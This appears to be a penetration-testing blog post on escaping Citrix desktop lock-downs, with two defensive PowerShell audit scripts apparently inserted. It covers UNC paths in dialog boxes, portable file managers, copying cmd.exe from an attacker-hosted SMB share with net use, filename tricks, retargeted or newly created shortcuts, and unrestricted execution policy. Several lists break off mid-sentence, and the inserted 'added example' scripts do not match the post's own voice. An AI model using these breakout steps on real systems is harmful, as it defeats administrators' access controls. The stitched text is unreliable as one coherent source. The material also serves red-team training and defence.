Citrix is a lock-down measure implemented in the desktop environment to minimize the potential impact of malicious staff members or compromised accounts. Administrators can use Citrix to restrict users from applications such as cmd.exe or powershell.exe. In environments where only minimal hardening is implemented, we can search for the applications but cannot run them; in a restrictive lock-down environment, searching for the application returns no results at all.
Usually, accessing C:\windows\system32 through File Explorer will cause an error, preventing direct access to critical system applications.
There are plenty of ways to break out of a Citrix environment, but we will go through
If we try to visit folders such as C:\Users or C:\windows\system32, it will result in an error due to the group policy in place that restricts users from browsing directories on the C:\ drive using File Explorer.
It is possible to use dialog boxes to bypass the restrictions implemented by group policy. Plenty of desktop applications allow users to navigate through system files.
Accessing any application that uses a dialog box can give us a way to bypass the restriction. This can be tools such as
If we run any of these applications, we will see that it allows the user to open a dialog box and search for files and folders on the system. We can enter a UNC path. UNC stands for "Universal Naming Convention"; it is used to access network resources and has the following format: \\server\share\folder\file. On localhost we can use the same concept to access local files.
Example: \\127.0.0.1\c$\users\username
In cases where restrictions are placed on File Explorer itself by Group Policy, alternative file managers such as Q-Dir and Explorer++ can come in handy to bypass the restriction. Copying files from an SMB share, which may otherwise be restricted, also becomes possible.
Note: Explorer++ is highly recommended because it is portable and can be executed directly without installation.
Similarly, if we can't use the default Registry Editor, we can install other applications such as:
https://sourceforge.net/projects/simpregedit
https://sourceforge.net/projects/uberregedit
https://sourceforge.net/projects/sre/
Help menus come in numerous formats, but application help menus in particular and the generic "Windows Help and Support" menu can come in quite handy.
These menus often have links and shortcuts to other applications such as Command Prompt or Control Panel.
An SMB share can be set up on the attacker's side to host applications such as Command Prompt, portable registry editors, etc.
To host an SMB share we can use Impacket's smbserver:
On the client side, we can use net use to connect to the share:
C:\>net use \\10.10.xx.x\smb
net use \\10.10.xx.x\smb
The command completed successfully.
And lastly, copy our desired binaries using copy:
C:\WINDOWS\Temp>copy \\10.10.xx.x\smb\cmd.exe \windows\temp\cmd.exe
copy \\10.10.xx.x\smb\cmd.exe \windows\temp\cmd.exe
1 file(s) copied.
This can be exploited on systems where only minimal hardening is implemented: access to directories such as C:\ may be denied, but symbolic links can be used to bypass the restriction. File protocol handlers can also come in handy for opening applications that would otherwise be unavailable.
This comes in handy when we want to use our own binaries on the system or write data to files for later use. Temporary folders such as TEMP should be the first place we look, and we can find the location of the directory using the %temp% environment variable.
TIP: We can also use tools such as accesschk.exe (Sysinternals) to find directories that we have write access to.
These restrictions are usually put in place using whitelists/blacklists, and can filter on:
1. Filenames
2. File extensions
3. Regex patterns
4. etc …
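From the defender's side, the copied cmd.exe in \windows\temp described above is easy to spot if you look for it. The following script is an added example, not code from the original post: it audits the writable temp locations named in the text for executables that are byte-identical to System32 binaries (a relocated or renamed copy keeps its hash) and reports their Authenticode status. The directory list and the set of watched binaries are assumptions; extend them with whatever accesschk reports as writable.

```powershell
# Added example (not from the original post): find system binaries copied
# into user-writable temp directories and list unsigned executables there.
# Assumed directory list; adjust to the paths accesschk shows as writable.
$suspectDirs = @("$env:TEMP", "$env:windir\Temp", "$env:PUBLIC")
$systemDir   = "$env:windir\System32"

# Binaries most often copied out of System32 to evade path-based restrictions.
# This list is an assumption; add any interpreter your policy blocks.
$watched = 'cmd.exe','powershell.exe','regedit.exe','mmc.exe','explorer.exe'

# Build a SHA256 -> name lookup so a copy is recognised regardless of its filename.
$knownHashes = @{}
foreach ($name in $watched) {
    $p = Join-Path $systemDir $name
    if (Test-Path $p) {
        $knownHashes[(Get-FileHash -Path $p -Algorithm SHA256).Hash] = $name
    }
}

$findings = foreach ($dir in $suspectDirs) {
    if (-not (Test-Path $dir)) { continue }
    Get-ChildItem -Path $dir -Recurse -File -Include *.exe,*.dll,*.com,*.ps1,*.bat,*.vbs -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            $sig  = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path           = $_.FullName
                CopyOfSystem   = $knownHashes[$hash]   # non-empty => relocated System32 binary
                SignatureState = $sig.Status            # Valid / NotSigned / HashMismatch ...
                LastWrite      = $_.LastWriteTime
            }
        }
}

# Relocated system binaries first, then everything else grouped by signature state.
$findings |
    Sort-Object -Property @{ Expression = { [string]::IsNullOrEmpty($_.CopyOfSystem) } }, SignatureState |
    Format-Table -AutoSize
```

Run it as the locked-down user to see exactly what that account could have staged; run it as an administrator to cover directories the user cannot list.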
We can usually bypass them by changing the name of our file or by using tools with extensions that are allowed.
Example: if .exe is denied, we can try .ps1.
But if the restrictions were put in place by a careful admin, it is very hard, if not impossible, to bypass them.
If we can access a shortcut, we can run an application of our choice. Windows uses a link (path) to connect the shortcut with the application, and by changing the path we can execute other binaries.
We can right-click on a shortcut > Properties > Target and change the target to our desired binary.
In cases where shortcuts are not available, we can transfer a shortcut file using an SMB share or create a new shortcut using PowerShell:
# The COM class is WScript.Shell; its CreateShortcut method creates a new .lnk
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "C:\Program Files\someprogram.exe"
$ShortcutFile = "C:\Users\user1\Desktop\mal.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
Note: this method can also be used to set up quick persistence, although it's not the best way to do so.
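Because the shortcut's target is just a path stored in the .lnk, the same COM object that writes it can read it back, which is how an administrator can hunt for shortcuts that have been retargeted or dropped as described above. The following audit is an added example, not code from the original post: it walks the user-writable shortcut locations and flags any .lnk whose target is a command interpreter, a UNC path, or a file outside the Windows and Program Files trees. The root directories, interpreter names and trusted paths are assumptions; tune them to your build.

```powershell
# Added example (not from the original post): audit .lnk files for targets
# a standard user should not be able to reach through a shortcut.
$shell = New-Object -ComObject WScript.Shell

# Assumed locations a standard user can write shortcuts to.
$lnkRoots = @(
    "$env:USERPROFILE\Desktop",
    "$env:APPDATA\Microsoft\Windows\Start Menu",
    "$env:PUBLIC\Desktop",
    "$env:ProgramData\Microsoft\Windows\Start Menu"
)
# Assumed interpreter list; add whatever your lock-down policy blocks.
$interpreters = 'cmd.exe','powershell.exe','pwsh.exe','wscript.exe','cscript.exe','mshta.exe','regedit.exe'
# Targets under these roots are considered expected; everything else is reported.
$trustedRoots = @("$env:windir", "$env:ProgramFiles", "${env:ProgramFiles(x86)}") | Where-Object { $_ }

$report = foreach ($root in $lnkRoots) {
    if (-not (Test-Path $root)) { continue }
    foreach ($lnk in Get-ChildItem -Path $root -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue) {
        # CreateShortcut on an existing .lnk loads it instead of creating a new one
        $sc      = $shell.CreateShortcut($lnk.FullName)
        $target  = $sc.TargetPath
        $leaf    = [IO.Path]::GetFileName($target).ToLowerInvariant()
        $reasons = @()
        if ($interpreters -contains $leaf) { $reasons += 'interpreter target' }
        if ($target -like '\\*')           { $reasons += 'UNC target' }
        if ($target -and -not ($trustedRoots | Where-Object { $target -like "$_\*" })) {
            $reasons += 'target outside trusted directories'
        }
        if ($reasons) {
            [pscustomobject]@{
                Shortcut  = $lnk.FullName
                Target    = $target
                Arguments = $sc.Arguments
                Reason    = ($reasons -join ', ')
                Modified  = $lnk.LastWriteTime
            }
        }
    }
}
$report | Format-Table -AutoSize
```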
When script extensions such as .bat, .vbs, .ps1, etc. are configured to execute automatically with their interpreters, we can use these scripts to download files, upload files, execute any binary, etc.
We can create a new file with any of those extensions, write code to execute the desired binary or perform the desired action, and simply run it.
PowerShell has an execution policy (a security measure). It controls whether users can load configuration files, such as the PowerShell profile, and run scripts, and whether scripts must be digitally signed before they can be run.
We can check the status of the execution policy and change it:
c:\> Get-Executionpolicy
C:\>Set-ExecutionPolicy unrestricted
For further details: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4
TIP: We can also use tools such as PowerSploit, which includes scripts that can come in handy: https://github.com/PowerShellMafia/PowerSploit
RDP and Citrix both have their own hotkeys that correspond to operating system functions. We can use these hotkeys to bypass restrictions and do things such as opening the Windows Security dialog box or displaying Task Manager.
Remote Desktop Hotkeys:
Citrix ICA Hotkeys:
I hope you enjoyed this blog, see you in the next one. Ciao!